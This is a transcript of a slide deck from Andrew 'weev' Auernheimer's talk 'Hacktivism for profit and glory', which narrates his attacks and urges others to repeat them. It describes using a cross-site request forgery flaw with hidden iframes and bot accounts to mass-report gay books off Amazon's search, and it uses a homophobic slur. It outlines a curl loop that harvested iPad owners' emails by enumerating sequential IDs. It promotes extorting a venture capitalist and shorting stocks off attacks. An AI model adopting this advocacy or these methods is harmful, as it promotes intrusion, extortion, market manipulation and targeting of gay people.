Эндрю Ауэрнхаймер - Хактивизм для получения прибыли и...
-
Upload
hackit-ukraine -
Category
Engineering
-
view
346 -
download
0
Transcript of Эндрю Ауэрнхаймер - Хактивизм для получения прибыли и...
Hacktivism for profit and glory
Using technology offensively and profitably against world powers and
major corporations.
One person can change the world.
• You can easily fight powers that appear bigger and stronger than you.
• I make lots of history, influencing nation states and Fortune 500 companies.
• I do this with no external capital or influence.
• Everybody who tried to stop me failed.
Andrew “weev” AuernheimerProfessional hacktivist.
Why I became a hacktivist
• The status quo is not fair to hackers
• Tech industry billionaires can’t even buy influence.
• America makes its hackers suffer greatly: Swartz, Moore, Love
Changing the world is profitable.
• Know the outcome of an economic event? Profit in financial markets.
• In financial markets, you only have to be right for a few hours.
• Know the outcome of an election? You can make profit in prediction markets.
I started small. • Pick a venture
capitalist that funds tech startups
• Announce your presence.
• Destroy his portfolio company by company until he pays you to go away.
2008: First nation-state attack
2009: First Fortune 500 attack
• XSRF: Cross site request forgery – no unique token to scrape to perform command on a site. Site wrongly trusts user’s browser.
• Can we use this to troll a corporation and shift a its value by billions of dollars?
Amazon had a XSRF-vuln
• There was a “Report Inappropriate Content” button on every Amazon page for logged in users that was a simple HTTP GET with any product ID at the end.
• Function automatically removed content from the search rankings if it got enough reports. It was still sold, but you couldn’t search for it.
This was so easy. Really bad code.
• An enumerated list of gay book product IDs:
Reported all gay books as inappropriate thousands of times.
• Put a hidden iframe on many websites that did a 302 redirect to the report as inappropriate function.
• Used cookies from bot-registered Amazon accounts to report it myself
• Net effect: you couldn’t search for gay faggot books on Amazon anymore.
What next? Make markets react.
• Contact gay bloggers, say Amazon was censoring homosexuals: #amazonfail
This bug was stupid.
• I couldn’t have ever sold it to anyone.• Amazon wouldn’t reward me for reporting it.• Objective market value was $0
• But I used it to drop Amazon’s market cap by $3.2 BILLION dollars for long enough for a short position to be profitable.
2010: Second Fortune 500 attack
• June of 2010, first Apple iPad 3G released, exclusive to AT&T.
• On iPad billing/registration server a simple HTTP GET with no authentication.
• Integer in URL is the integrated circuit card identifier (ICCID) – unique ID for device SIM
• Takes ICCID and returns email of registered user.
Oops.
• Apple and AT&T made this for convenience, so when you visit the billing site it would automatically fill in the email of your device to login faster.
• It’s just an HTTP GET, and the ID is just a number. What they really did was publish a complete list of iPad users on the Internet.
Exploitation
• Once again, very simple. Numerical IDs are in sequence. As simple as let count, while true, do curl $i, done.
• I have a full list of Apple iPad 3G owner emails and the corresponding ICC-IDs.
• What can I do now?
Risk assessment
• If I were a bad guy, I would send a Safari exploit to every iPad. (and we had one)
• The IMSI can be derived from the ICCID (unique to AT&T) which would allow for IMSI catchers and man in the middle attacks.
• Targeted advertisements: iPad accessories.• I could do any of these things, but I’d rather do
the right thing and change the world.
Public disclosure.
• We had an name from offensive Internet meme: Goatse Security. If you have not heard of the Goatse meme do not look it up.
• “Subsidiary of” GNAA troll organization
• Adds embarrassment for AT&T and Apple.
I disclose the issue to a journalist.
If you want to change the world:social sophistication is equally as
needed as technical sophistication.
Surprise! I
Now the hard part comes
• Kidnapped thousands of kilometers to foreign territory, beaten by US Marshalls along the way
• The parts of America that the feds bring you to are hell on earth
• Banned from the Internet for years
Liberty must be defended.• I accessed a public webserver
and told a journalist about what was on it.
• This is unequivocally not criminal activity.
• If accessing a public webserver is a crime the Internet only contains criminal activities.
• None of this mattered to American courts.
Free at last
Eventually a higher court admitted my conviction was based on lies from the FBI and DOJ and violated my rights.
Total time lost:39 months
Let’s do more of this.
Have it your way USA, I’ll go.
August 2016: methods are mainstream
• Muddy Waters now using software vulns for financial intelligence
• The FBI said my desire to short sell off of vuln was evidence of criminal intent, and now it is a common industry practice.
2016: Latest nation-state attack
Takeaway
• Technology enables agile individuals to act with more efficacy than the world’s biggest empires.
• Every day that goes by, smaller entities grow more effective than big entities.
• Be relentless, you’ll eventually be proven right and see your positions legitimized.
Fin.
@rabite
weevlos
weev0
weev